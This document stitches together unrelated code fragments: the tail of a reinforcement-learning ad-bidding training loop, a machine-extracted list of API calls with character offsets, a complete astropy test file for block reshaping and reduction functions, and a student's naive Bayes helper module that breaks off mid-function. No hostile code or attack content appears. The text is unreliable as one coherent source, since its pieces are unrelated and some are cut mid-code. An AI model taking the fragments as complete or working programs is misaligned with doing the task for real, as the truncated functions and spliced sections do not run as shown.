bid_datas = generate_bid_price((hour_datas[:, ctr_index] * (hb_base / origin_ctr)) / (1 + action))
res_ = bid_main(bid_datas, hour_datas, budget)
# win_clks, real_clks, bids, imps, cost
train_records = [train_records[i] + res_[i] for i in range(len(train_records))]
budget -= res_[-1]
left_hour_ratio = (23 - t) / 23 if t <= 23 else 0
if (not left_hour_ratio) or (budget <= 0):
done = 1
# avg_budget_ratio, cost_ratio, ctr, win_rate
next_state = [(budget / B) / left_hour_ratio if left_hour_ratio else (budget / B),
res_[4] / B,
res_[0] / res_[3] if res_[3] else 0,
res_[3] / res_[2] if res_[2] else 0]
tmp_state = next_state
hb_bid_datas = generate_bid_price(hour_datas[:, ctr_index] * hb_base / origin_ctr)
res_hb = bid_main(hb_bid_datas, hour_datas, budget)
r_t = reward_func(args.reward_type, res_[0], res_hb[0], res_[3], res_hb[3])
transitions = torch.cat([state, torch.tensor([action]).float(),
torch.tensor(next_state).float(),
torch.tensor([done]).float(), torch.tensor([r_t]).float()], dim=-1).unsqueeze(
0).to(device)
rl_model.store_transition(transitions)
if rl_model.memory.memory_counter >= args.rl_batch_size:
critic_loss = rl_model.learn()
if ep % 10 == 0:
ep_train_records.append([ep] + train_records + [critic_loss])
# print('train', records, critic_loss)
train_record_df = pd.DataFrame(data=ep_train_records,
columns=['ep', 'clks', 'real_clks', 'bids', 'imps', 'cost', 'loss'])
train_record_df.to_csv(submission_path + 'fab_train_records_' + args.reward_type + str(args.budget_para[0]) + '.csv', index=None)
test_record_df = pd.DataFrame(data=ep_test_records,
columns=['ep', 'clks', 'real_clks', 'bids', 'imps', 'cost', 'loss'])
test_record_df.to_csv(submission_path + 'fab_test_records_' + args.reward_type + str(args.budget_para[0]) + '.csv', index=None)
test_action_df = pd.DataFrame(data=ep_test_actions)
test_action_df.to_csv(submission_path + 'fab_test_actions_' + args.reward_type + str(args.budget_para[0]) + '.csv')
| [
"os.mkdir",
"numpy.random.seed",
"numpy.sum",
"pandas.read_csv",
"logging.getLogger",
"numpy.arange",
"torch.device",
"pandas.DataFrame",
"os.path.exists",
"random.seed",
"datetime.datetime.now",
"torch.manual_seed",
"logging.StreamHandler",
"FAB.models.RL_brain_fab.TD3_Model",
"numpy.se... | [((326, 348), 'numpy.seterr', 'np.seterr', ([], {'all': '"""raise"""'}), "(all='raise')\n", (335, 348), True, 'import numpy as np\n'), ((377, 400), 'torch.manual_seed', 'torch.manual_seed', (['seed'], {}), '(seed)\n', (394, 400), False, 'import torch\n'), ((405, 437), 'torch.cuda.manual_seed_all', 'torch.cuda.manual_seed_all', (['seed'], {}), '(seed)\n', (431, 437), False, 'import torch\n'), ((442, 462), 'numpy.random.seed', 'np.random.seed', (['seed'], {}), '(seed)\n', (456, 462), True, 'import numpy as np\n'), ((467, 484), 'random.seed', 'random.seed', (['seed'], {}), '(seed)\n', (478, 484), False, 'import random\n'), ((3776, 3954), 'FAB.models.RL_brain_fab.TD3_Model', 'td3.TD3_Model', (['args.neuron_nums'], {'action_nums': '(1)', 'lr_A': 'args.lr_A', 'lr_C': 'args.lr_C', 'memory_size': 'args.memory_size', 'tau': 'args.tau', 'batch_size': 'args.rl_batch_size', 'device': 'device'}), '(args.neuron_nums, action_nums=1, lr_A=args.lr_A, lr_C=args.\n lr_C, memory_size=args.memory_size, tau=args.tau, batch_size=args.\n rl_batch_size, device=device)\n', (3789, 3954), True, 'import FAB.models.RL_brain_fab as td3\n'), ((5792, 5823), 'FAB.config.config.init_parser', 'config.init_parser', (['campaign_id'], {}), '(campaign_id)\n', (5810, 5823), False, 'from FAB.config import config\n'), ((6635, 6662), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (6652, 6662), False, 'import logging\n'), ((6720, 6753), 'logging.StreamHandler', 'logging.StreamHandler', (['sys.stdout'], {}), '(sys.stdout)\n', (6741, 6753), False, 'import logging\n'), ((7046, 7071), 'torch.device', 'torch.device', (['args.device'], {}), '(args.device)\n', (7058, 7071), False, 'import torch\n'), ((7878, 7901), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (7899, 7901), False, 'import datetime\n'), ((12547, 12655), 'pandas.DataFrame', 'pd.DataFrame', ([], {'data': 'ep_train_records', 'columns': "['ep', 'clks', 'real_clks', 'bids', 'imps', 'cost', 'loss']"}), "(data=ep_train_records, columns=['ep', 'clks', 'real_clks',\n 'bids', 'imps', 'cost', 'loss'])\n", (12559, 12655), True, 'import pandas as pd\n'), ((12843, 12950), 'pandas.DataFrame', 'pd.DataFrame', ([], {'data': 'ep_test_records', 'columns': "['ep', 'clks', 'real_clks', 'bids', 'imps', 'cost', 'loss']"}), "(data=ep_test_records, columns=['ep', 'clks', 'real_clks',\n 'bids', 'imps', 'cost', 'loss'])\n", (12855, 12950), True, 'import pandas as pd\n'), ((13135, 13169), 'pandas.DataFrame', 'pd.DataFrame', ([], {'data': 'ep_test_actions'}), '(data=ep_test_actions)\n', (13147, 13169), True, 'import pandas as pd\n'), ((896, 935), 'numpy.where', 'np.where', (['(bid_prices >= imp_datas[:, 2])'], {}), '(bid_prices >= imp_datas[:, 2])\n', (904, 935), True, 'import numpy as np\n'), ((1668, 1706), 'numpy.sum', 'np.sum', (['win_imp_datas[:final_index, 0]'], {}), '(win_imp_datas[:final_index, 0])\n', (1674, 1706), True, 'import numpy as np\n'), ((1783, 1818), 'numpy.sum', 'np.sum', (['imp_datas[:origin_index, 0]'], {}), '(imp_datas[:origin_index, 0])\n', (1789, 1818), True, 'import numpy as np\n'), ((1898, 1936), 'numpy.sum', 'np.sum', (['win_imp_datas[:final_index, 2]'], {}), '(win_imp_datas[:final_index, 2])\n', (1904, 1936), True, 'import numpy as np\n'), ((1960, 1998), 'numpy.sum', 'np.sum', (['win_imp_datas[:final_index, 2]'], {}), '(win_imp_datas[:final_index, 2])\n', (1966, 1998), True, 'import numpy as np\n'), ((4408, 4474), 'pandas.read_csv', 'pd.read_csv', (["(data_path + 'train.bid.' + args.sample_type + '.data')"], {}), "(data_path + 'train.bid.' + args.sample_type + '.data')\n", (4419, 4474), True, 'import pandas as pd\n'), ((4500, 4565), 'pandas.read_csv', 'pd.read_csv', (["(data_path + 'test.bid.' + args.sample_type + '.data')"], {}), "(data_path + 'test.bid.' + args.sample_type + '.data')\n", (4511, 4565), True, 'import pandas as pd\n'), ((4752, 4776), 'numpy.sum', 'np.sum', (['train_data[:, 2]'], {}), '(train_data[:, 2])\n', (4758, 4776), True, 'import numpy as np\n'), ((4779, 4803), 'numpy.sum', 'np.sum', (['train_data[:, 0]'], {}), '(train_data[:, 0])\n', (4785, 4803), True, 'import numpy as np\n'), ((4821, 4845), 'numpy.sum', 'np.sum', (['train_data[:, 0]'], {}), '(train_data[:, 0])\n', (4827, 4845), True, 'import numpy as np\n'), ((4881, 4905), 'numpy.sum', 'np.sum', (['train_data[:, 2]'], {}), '(train_data[:, 2])\n', (4887, 4905), True, 'import numpy as np\n'), ((6965, 6996), 'os.path.exists', 'os.path.exists', (['submission_path'], {}), '(submission_path)\n', (6979, 6996), False, 'import os\n'), ((7006, 7031), 'os.mkdir', 'os.mkdir', (['submission_path'], {}), '(submission_path)\n', (7014, 7031), False, 'import os\n'), ((1249, 1279), 'numpy.sum', 'np.sum', (['win_imp_datas[:mid, 2]'], {}), '(win_imp_datas[:mid, 2])\n', (1255, 1279), True, 'import numpy as np\n'), ((6046, 6069), 'os.path.exists', 'os.path.exists', (['log_dir'], {}), '(log_dir)\n', (6060, 6069), False, 'import os\n'), ((6083, 6100), 'os.mkdir', 'os.mkdir', (['log_dir'], {}), '(log_dir)\n', (6091, 6100), False, 'import os\n'), ((6229, 6254), 'os.path.exists', 'os.path.exists', (['param_dir'], {}), '(param_dir)\n', (6243, 6254), False, 'import os\n'), ((6268, 6287), 'os.mkdir', 'os.mkdir', (['param_dir'], {}), '(param_dir)\n', (6276, 6287), False, 'import os\n'), ((1390, 1424), 'numpy.sum', 'np.sum', (['win_imp_datas[:mid - 1, 2]'], {}), '(win_imp_datas[:mid - 1, 2])\n', (1396, 1424), True, 'import numpy as np\n'), ((2985, 3023), 'numpy.sum', 'np.sum', (['final_imps[:last_win_index, 0]'], {}), '(final_imps[:last_win_index, 0])\n', (2991, 3023), True, 'import numpy as np\n'), ((7291, 7314), 'numpy.arange', 'np.arange', (['(100)', '(301)', '(10)'], {}), '(100, 301, 10)\n', (7300, 7314), True, 'import numpy as np\n'), ((2225, 2261), 'numpy.where', 'np.where', (['(final_imps[:, 2] <= budget)'], {}), '(final_imps[:, 2] <= budget)\n', (2233, 2261), True, 'import numpy as np\n'), ((7233, 7252), 'numpy.arange', 'np.arange', (['(2)', '(20)', '(2)'], {}), '(2, 20, 2)\n', (7242, 7252), True, 'import numpy as np\n'), ((7261, 7282), 'numpy.arange', 'np.arange', (['(20)', '(100)', '(5)'], {}), '(20, 100, 5)\n', (7270, 7282), True, 'import numpy as np\n'), ((10562, 10586), 'torch.tensor', 'torch.tensor', (['init_state'], {}), '(init_state)\n', (10574, 10586), False, 'import torch\n'), ((10609, 10632), 'torch.tensor', 'torch.tensor', (['tmp_state'], {}), '(tmp_state)\n', (10621, 10632), False, 'import torch\n'), ((8524, 8553), 'torch.tensor', 'torch.tensor', (['init_test_state'], {}), '(init_test_state)\n', (8536, 8553), False, 'import torch\n'), ((8576, 8604), 'torch.tensor', 'torch.tensor', (['tmp_test_state'], {}), '(tmp_test_state)\n', (8588, 8604), False, 'import torch\n'), ((11935, 11957), 'torch.tensor', 'torch.tensor', (['[action]'], {}), '([action])\n', (11947, 11957), False, 'import torch\n'), ((12008, 12032), 'torch.tensor', 'torch.tensor', (['next_state'], {}), '(next_state)\n', (12020, 12032), False, 'import torch\n'), ((12083, 12103), 'torch.tensor', 'torch.tensor', (['[done]'], {}), '([done])\n', (12095, 12103), False, 'import torch\n'), ((12113, 12132), 'torch.tensor', 'torch.tensor', (['[r_t]'], {}), '([r_t])\n', (12125, 12132), False, 'import torch\n')] |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
import numpy as np
import pytest
from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate
class TestReshapeAsBlocks:
def test_1d(self):
data = np.arange(16)
reshaped = reshape_as_blocks(data, 2)
assert reshaped.shape == (8, 2)
reshaped = reshape_as_blocks(data, 4)
assert reshaped.shape == (4, 4)
reshaped = reshape_as_blocks(data, 8)
assert reshaped.shape == (2, 8)
def test_2d(self):
data = np.arange(16).reshape(4, 4)
reshaped = reshape_as_blocks(data, (2, 2))
assert reshaped.shape == (2, 2, 2, 2)
data = np.arange(64).reshape(8, 8)
reshaped = reshape_as_blocks(data, (2, 2))
assert reshaped.shape == (4, 4, 2, 2)
reshaped = reshape_as_blocks(data, (4, 4))
assert reshaped.shape == (2, 2, 4, 4)
def test_3d(self):
data = np.arange(64).reshape(4, 4, 4)
reshaped = reshape_as_blocks(data, (2, 2, 2))
assert reshaped.shape == (2, 2, 2, 2, 2, 2)
data = np.arange(2*3*4).reshape(2, 3, 4)
reshaped = reshape_as_blocks(data, (2, 1, 2))
assert reshaped.shape == (1, 3, 2, 2, 1, 2)
def test_view(self):
data = np.arange(16).reshape(4, 4)
reshaped = reshape_as_blocks(data, (2, 2))
data[0, 0] = 100
assert reshaped[0, 0, 0, 0] == 100
def test_invalid_block_dim(self):
data = np.arange(64).reshape(4, 4, 4)
match = ('block_size must be a scalar or have the same '
'length as the number of data dimensions')
with pytest.raises(ValueError, match=match):
reshape_as_blocks(data, (2, 2))
def test_invalid_block_size(self):
data = np.arange(16).reshape(4, 4)
match = ('Each dimension of block_size must divide evenly '
'into the corresponding dimension of data')
with pytest.raises(ValueError, match=match):
reshape_as_blocks(data, (2, 3))
def test_invalid_block_value(self):
data = np.arange(16).reshape(4, 4)
match = 'block_size elements must be integers'
with pytest.raises(ValueError, match=match):
reshape_as_blocks(data, (2.1, 2))
match = 'block_size elements must be strictly positive'
with pytest.raises(ValueError, match=match):
reshape_as_blocks(data, (-1, 0))
class TestBlockReduce:
def test_1d(self):
"""Test 1D array."""
data = np.arange(4)
expected = np.array([1, 5])
result = block_reduce(data, 2)
assert np.all(result == expected)
def test_1d_mean(self):
"""Test 1D array with func=np.mean."""
data = np.arange(4)
block_size = 2.
expected = block_reduce(data, block_size, func=np.sum) / block_size
result_mean = block_reduce(data, block_size, func=np.mean)
assert np.all(result_mean == expected)
def test_2d(self):
"""Test 2D array."""
data = np.arange(4).reshape(2, 2)
expected = np.array([[6]])
result = block_reduce(data, 2)
assert np.all(result == expected)
def test_2d_mean(self):
"""Test 2D array with func=np.mean."""
data = np.arange(4).reshape(2, 2)
block_size = 2.
expected = (block_reduce(data, block_size, func=np.sum) /
block_size**2)
result = block_reduce(data, block_size, func=np.mean)
assert np.all(result == expected)
def test_2d_trim(self):
"""
Test trimming of 2D array when size is not perfectly divisible
by block_size.
"""
data1 = np.arange(15).reshape(5, 3)
result1 = block_reduce(data1, 2)
data2 = data1[0:4, 0:2]
result2 = block_reduce(data2, 2)
assert np.all(result1 == result2)
def test_block_size_broadcasting(self):
"""Test scalar block_size broadcasting."""
data = np.arange(16).reshape(4, 4)
result1 = block_reduce(data, 2)
result2 = block_reduce(data, (2, 2))
assert np.all(result1 == result2)
def test_block_size_len(self):
"""Test block_size length."""
data = np.ones((2, 2))
with pytest.raises(ValueError):
block_reduce(data, (2, 2, 2))
class TestBlockReplicate:
def test_1d(self):
"""Test 1D array."""
data = np.arange(2)
expected = np.array([0, 0, 0.5, 0.5])
result = block_replicate(data, 2)
assert np.all(result == expected)
def test_1d_conserve_sum(self):
"""Test 1D array with conserve_sum=False."""
data = np.arange(2)
block_size = 2.
expected = block_replicate(data, block_size) * block_size
result = block_replicate(data, block_size, conserve_sum=False)
assert np.all(result == expected)
def test_2d(self):
"""Test 2D array."""
data = np.arange(2).reshape(2, 1)
expected = np.array([[0, 0], [0, 0], [0.25, 0.25], [0.25, 0.25]])
result = block_replicate(data, 2)
assert np.all(result == expected)
def test_2d_conserve_sum(self):
"""Test 2D array with conserve_sum=False."""
data = np.arange(6).reshape(2, 3)
block_size = 2.
expected = block_replicate(data, block_size) * block_size**2
result = block_replicate(data, block_size, conserve_sum=False)
assert np.all(result == expected)
def test_block_size_broadcasting(self):
"""Test scalar block_size broadcasting."""
data = np.arange(4).reshape(2, 2)
result1 = block_replicate(data, 2)
result2 = block_replicate(data, (2, 2))
assert np.all(result1 == result2)
def test_block_size_len(self):
"""Test block_size length."""
data = np.arange(5)
with pytest.raises(ValueError):
block_replicate(data, (2, 2))
| [
"numpy.ones",
"astropy.nddata.reshape_as_blocks",
"pytest.raises",
"numpy.array",
"numpy.arange",
"astropy.nddata.block_reduce",
"astropy.nddata.block_replicate",
"numpy.all"
] | [((242, 255), 'numpy.arange', 'np.arange', (['(16)'], {}), '(16)\n', (251, 255), True, 'import numpy as np\n'), ((275, 301), 'astropy.nddata.reshape_as_blocks', 'reshape_as_blocks', (['data', '(2)'], {}), '(data, 2)\n', (292, 301), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((361, 387), 'astropy.nddata.reshape_as_blocks', 'reshape_as_blocks', (['data', '(4)'], {}), '(data, 4)\n', (378, 387), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((447, 473), 'astropy.nddata.reshape_as_blocks', 'reshape_as_blocks', (['data', '(8)'], {}), '(data, 8)\n', (464, 473), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((600, 631), 'astropy.nddata.reshape_as_blocks', 'reshape_as_blocks', (['data', '(2, 2)'], {}), '(data, (2, 2))\n', (617, 631), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((741, 772), 'astropy.nddata.reshape_as_blocks', 'reshape_as_blocks', (['data', '(2, 2)'], {}), '(data, (2, 2))\n', (758, 772), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((838, 869), 'astropy.nddata.reshape_as_blocks', 'reshape_as_blocks', (['data', '(4, 4)'], {}), '(data, (4, 4))\n', (855, 869), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((1005, 1039), 'astropy.nddata.reshape_as_blocks', 'reshape_as_blocks', (['data', '(2, 2, 2)'], {}), '(data, (2, 2, 2))\n', (1022, 1039), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((1161, 1195), 'astropy.nddata.reshape_as_blocks', 'reshape_as_blocks', (['data', '(2, 1, 2)'], {}), '(data, (2, 1, 2))\n', (1178, 1195), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((1336, 1367), 'astropy.nddata.reshape_as_blocks', 'reshape_as_blocks', (['data', '(2, 2)'], {}), '(data, (2, 2))\n', (1353, 1367), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((2545, 2557), 'numpy.arange', 'np.arange', (['(4)'], {}), '(4)\n', (2554, 2557), True, 'import numpy as np\n'), ((2577, 2593), 'numpy.array', 'np.array', (['[1, 5]'], {}), '([1, 5])\n', (2585, 2593), True, 'import numpy as np\n'), ((2611, 2632), 'astropy.nddata.block_reduce', 'block_reduce', (['data', '(2)'], {}), '(data, 2)\n', (2623, 2632), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((2648, 2674), 'numpy.all', 'np.all', (['(result == expected)'], {}), '(result == expected)\n', (2654, 2674), True, 'import numpy as np\n'), ((2766, 2778), 'numpy.arange', 'np.arange', (['(4)'], {}), '(4)\n', (2775, 2778), True, 'import numpy as np\n'), ((2901, 2945), 'astropy.nddata.block_reduce', 'block_reduce', (['data', 'block_size'], {'func': 'np.mean'}), '(data, block_size, func=np.mean)\n', (2913, 2945), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((2961, 2992), 'numpy.all', 'np.all', (['(result_mean == expected)'], {}), '(result_mean == expected)\n', (2967, 2992), True, 'import numpy as np\n'), ((3107, 3122), 'numpy.array', 'np.array', (['[[6]]'], {}), '([[6]])\n', (3115, 3122), True, 'import numpy as np\n'), ((3140, 3161), 'astropy.nddata.block_reduce', 'block_reduce', (['data', '(2)'], {}), '(data, 2)\n', (3152, 3161), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((3177, 3203), 'numpy.all', 'np.all', (['(result == expected)'], {}), '(result == expected)\n', (3183, 3203), True, 'import numpy as np\n'), ((3464, 3508), 'astropy.nddata.block_reduce', 'block_reduce', (['data', 'block_size'], {'func': 'np.mean'}), '(data, block_size, func=np.mean)\n', (3476, 3508), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((3524, 3550), 'numpy.all', 'np.all', (['(result == expected)'], {}), '(result == expected)\n', (3530, 3550), True, 'import numpy as np\n'), ((3761, 3783), 'astropy.nddata.block_reduce', 'block_reduce', (['data1', '(2)'], {}), '(data1, 2)\n', (3773, 3783), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((3834, 3856), 'astropy.nddata.block_reduce', 'block_reduce', (['data2', '(2)'], {}), '(data2, 2)\n', (3846, 3856), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((3872, 3898), 'numpy.all', 'np.all', (['(result1 == result2)'], {}), '(result1 == result2)\n', (3878, 3898), True, 'import numpy as np\n'), ((4056, 4077), 'astropy.nddata.block_reduce', 'block_reduce', (['data', '(2)'], {}), '(data, 2)\n', (4068, 4077), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((4096, 4122), 'astropy.nddata.block_reduce', 'block_reduce', (['data', '(2, 2)'], {}), '(data, (2, 2))\n', (4108, 4122), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((4138, 4164), 'numpy.all', 'np.all', (['(result1 == result2)'], {}), '(result1 == result2)\n', (4144, 4164), True, 'import numpy as np\n'), ((4254, 4269), 'numpy.ones', 'np.ones', (['(2, 2)'], {}), '((2, 2))\n', (4261, 4269), True, 'import numpy as np\n'), ((4447, 4459), 'numpy.arange', 'np.arange', (['(2)'], {}), '(2)\n', (4456, 4459), True, 'import numpy as np\n'), ((4479, 4505), 'numpy.array', 'np.array', (['[0, 0, 0.5, 0.5]'], {}), '([0, 0, 0.5, 0.5])\n', (4487, 4505), True, 'import numpy as np\n'), ((4523, 4547), 'astropy.nddata.block_replicate', 'block_replicate', (['data', '(2)'], {}), '(data, 2)\n', (4538, 4547), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((4563, 4589), 'numpy.all', 'np.all', (['(result == expected)'], {}), '(result == expected)\n', (4569, 4589), True, 'import numpy as np\n'), ((4695, 4707), 'numpy.arange', 'np.arange', (['(2)'], {}), '(2)\n', (4704, 4707), True, 'import numpy as np\n'), ((4815, 4868), 'astropy.nddata.block_replicate', 'block_replicate', (['data', 'block_size'], {'conserve_sum': '(False)'}), '(data, block_size, conserve_sum=False)\n', (4830, 4868), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((4884, 4910), 'numpy.all', 'np.all', (['(result == expected)'], {}), '(result == expected)\n', (4890, 4910), True, 'import numpy as np\n'), ((5025, 5079), 'numpy.array', 'np.array', (['[[0, 0], [0, 0], [0.25, 0.25], [0.25, 0.25]]'], {}), '([[0, 0], [0, 0], [0.25, 0.25], [0.25, 0.25]])\n', (5033, 5079), True, 'import numpy as np\n'), ((5097, 5121), 'astropy.nddata.block_replicate', 'block_replicate', (['data', '(2)'], {}), '(data, 2)\n', (5112, 5121), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((5137, 5163), 'numpy.all', 'np.all', (['(result == expected)'], {}), '(result == expected)\n', (5143, 5163), True, 'import numpy as np\n'), ((5406, 5459), 'astropy.nddata.block_replicate', 'block_replicate', (['data', 'block_size'], {'conserve_sum': '(False)'}), '(data, block_size, conserve_sum=False)\n', (5421, 5459), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((5475, 5501), 'numpy.all', 'np.all', (['(result == expected)'], {}), '(result == expected)\n', (5481, 5501), True, 'import numpy as np\n'), ((5658, 5682), 'astropy.nddata.block_replicate', 'block_replicate', (['data', '(2)'], {}), '(data, 2)\n', (5673, 5682), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((5701, 5730), 'astropy.nddata.block_replicate', 'block_replicate', (['data', '(2, 2)'], {}), '(data, (2, 2))\n', (5716, 5730), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((5746, 5772), 'numpy.all', 'np.all', (['(result1 == result2)'], {}), '(result1 == result2)\n', (5752, 5772), True, 'import numpy as np\n'), ((5862, 5874), 'numpy.arange', 'np.arange', (['(5)'], {}), '(5)\n', (5871, 5874), True, 'import numpy as np\n'), ((1659, 1697), 'pytest.raises', 'pytest.raises', (['ValueError'], {'match': 'match'}), '(ValueError, match=match)\n', (1672, 1697), False, 'import pytest\n'), ((1711, 1742), 'astropy.nddata.reshape_as_blocks', 'reshape_as_blocks', (['data', '(2, 2)'], {}), '(data, (2, 2))\n', (1728, 1742), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((1968, 2006), 'pytest.raises', 'pytest.raises', (['ValueError'], {'match': 'match'}), '(ValueError, match=match)\n', (1981, 2006), False, 'import pytest\n'), ((2020, 2051), 'astropy.nddata.reshape_as_blocks', 'reshape_as_blocks', (['data', '(2, 3)'], {}), '(data, (2, 3))\n', (2037, 2051), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((2204, 2242), 'pytest.raises', 'pytest.raises', (['ValueError'], {'match': 'match'}), '(ValueError, match=match)\n', (2217, 2242), False, 'import pytest\n'), ((2256, 2289), 'astropy.nddata.reshape_as_blocks', 'reshape_as_blocks', (['data', '(2.1, 2)'], {}), '(data, (2.1, 2))\n', (2273, 2289), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((2368, 2406), 'pytest.raises', 'pytest.raises', (['ValueError'], {'match': 'match'}), '(ValueError, match=match)\n', (2381, 2406), False, 'import pytest\n'), ((2420, 2452), 'astropy.nddata.reshape_as_blocks', 'reshape_as_blocks', (['data', '(-1, 0)'], {}), '(data, (-1, 0))\n', (2437, 2452), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((2822, 2865), 'astropy.nddata.block_reduce', 'block_reduce', (['data', 'block_size'], {'func': 'np.sum'}), '(data, block_size, func=np.sum)\n', (2834, 2865), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((3366, 3409), 'astropy.nddata.block_reduce', 'block_reduce', (['data', 'block_size'], {'func': 'np.sum'}), '(data, block_size, func=np.sum)\n', (3378, 3409), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((4283, 4308), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (4296, 4308), False, 'import pytest\n'), ((4322, 4351), 'astropy.nddata.block_reduce', 'block_reduce', (['data', '(2, 2, 2)'], {}), '(data, (2, 2, 2))\n', (4334, 4351), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((4751, 4784), 'astropy.nddata.block_replicate', 'block_replicate', (['data', 'block_size'], {}), '(data, block_size)\n', (4766, 4784), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((5339, 5372), 'astropy.nddata.block_replicate', 'block_replicate', (['data', 'block_size'], {}), '(data, block_size)\n', (5354, 5372), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((5888, 5913), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (5901, 5913), False, 'import pytest\n'), ((5927, 5956), 'astropy.nddata.block_replicate', 'block_replicate', (['data', '(2, 2)'], {}), '(data, (2, 2))\n', (5942, 5956), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((553, 566), 'numpy.arange', 'np.arange', (['(16)'], {}), '(16)\n', (562, 566), True, 'import numpy as np\n'), ((694, 707), 'numpy.arange', 'np.arange', (['(64)'], {}), '(64)\n', (703, 707), True, 'import numpy as np\n'), ((955, 968), 'numpy.arange', 'np.arange', (['(64)'], {}), '(64)\n', (964, 968), True, 'import numpy as np\n'), ((1108, 1128), 'numpy.arange', 'np.arange', (['(2 * 3 * 4)'], {}), '(2 * 3 * 4)\n', (1117, 1128), True, 'import numpy as np\n'), ((1289, 1302), 'numpy.arange', 'np.arange', (['(16)'], {}), '(16)\n', (1298, 1302), True, 'import numpy as np\n'), ((1490, 1503), 'numpy.arange', 'np.arange', (['(64)'], {}), '(64)\n', (1499, 1503), True, 'import numpy as np\n'), ((1798, 1811), 'numpy.arange', 'np.arange', (['(16)'], {}), '(16)\n', (1807, 1811), True, 'import numpy as np\n'), ((2108, 2121), 'numpy.arange', 'np.arange', (['(16)'], {}), '(16)\n', (2117, 2121), True, 'import numpy as np\n'), ((3061, 3073), 'numpy.arange', 'np.arange', (['(4)'], {}), '(4)\n', (3070, 3073), True, 'import numpy as np\n'), ((3295, 3307), 'numpy.arange', 'np.arange', (['(4)'], {}), '(4)\n', (3304, 3307), True, 'import numpy as np\n'), ((3715, 3728), 'numpy.arange', 'np.arange', (['(15)'], {}), '(15)\n', (3724, 3728), True, 'import numpy as np\n'), ((4010, 4023), 'numpy.arange', 'np.arange', (['(16)'], {}), '(16)\n', (4019, 4023), True, 'import numpy as np\n'), ((4979, 4991), 'numpy.arange', 'np.arange', (['(2)'], {}), '(2)\n', (4988, 4991), True, 'import numpy as np\n'), ((5269, 5281), 'numpy.arange', 'np.arange', (['(6)'], {}), '(6)\n', (5278, 5281), True, 'import numpy as np\n'), ((5613, 5625), 'numpy.arange', 'np.arange', (['(4)'], {}), '(4)\n', (5622, 5625), True, 'import numpy as np\n')] |
"""
<NAME> -- Student ID: 919519311
Assignment 3 -- February 2020
Implemented here is the low-level functionality of the
naive Bayes classifier. Defined below are four functions:
estimatePrior() computes the probability of each class
occurring in the validation set.
getNumClasses() gets the number of classes defined in
the data set, along with an array
of the class values themselves.
gaussian() returns the value of the Gaussian
probability density function, given
mean, standard deviation and an input value.
learnGreek() computes the mean and standard deviation
associated with a given training object.
Functions defined here are called in the Experiment.py file.
"""
import numpy as np
from collections import Counter
def estimatePrior(labels):
"""
:param labels: ground truth labels for validation data
:return: priors: dictionary of class instances
"""
classes, numClasses = getNumClasses(labels)
numObjects = np.size(labels)
# Count class instances:
priors = Counter(labels)
# Compute prior probabilities per class:
for i in range(numClasses):
priors[classes[i]] = priors[classes[i]] / numObjects
return priors
def getNumClasses(labels):
"""
:param labels: ground truth labels for a data set
:return: classes: array of class labels used
:return: numClasses: number of classes in the data set
"""
classes = np.array([], dtype=int)
numClasses = 0
found = False
for i in range(np.size(labels)):
for j in range(np.size(classes)):
if classes[j] == labels[i]:
found = True
break
if not found:
classes = np.append(classes, labels[i])
numClasses += 1
else:
found = False
return classes, numClasses
def gaussian(feature, mean, stdDev):
"""
:param feature: single value taken by an attribute
:param mean: mean value associated with the corresponding class
:param stdDev: standard deviation associated with the corresponding class
:return: output of Gaussian for naive Bayes classifier over continuous data
"""
exTerm = -1 * ((np.square(feature - mean)) / (2*np.square(stdDev)))
piTerm = np.reciprocal(stdDev * np.sqrt(2*np.pi))
return piTerm * np.exp(exTerm)
def learnGreek(features):
"""
:param features: sub-array of all features associated with a given class label
:return: mean: array of mean values for all attributes
:return: stdDev: array of standard deviation values for all attributes
"""
numAttributes = np.size(features, axis=1)
mean = np.zeros(numAttributes)
stdDev = np.zeros(numAttributes)
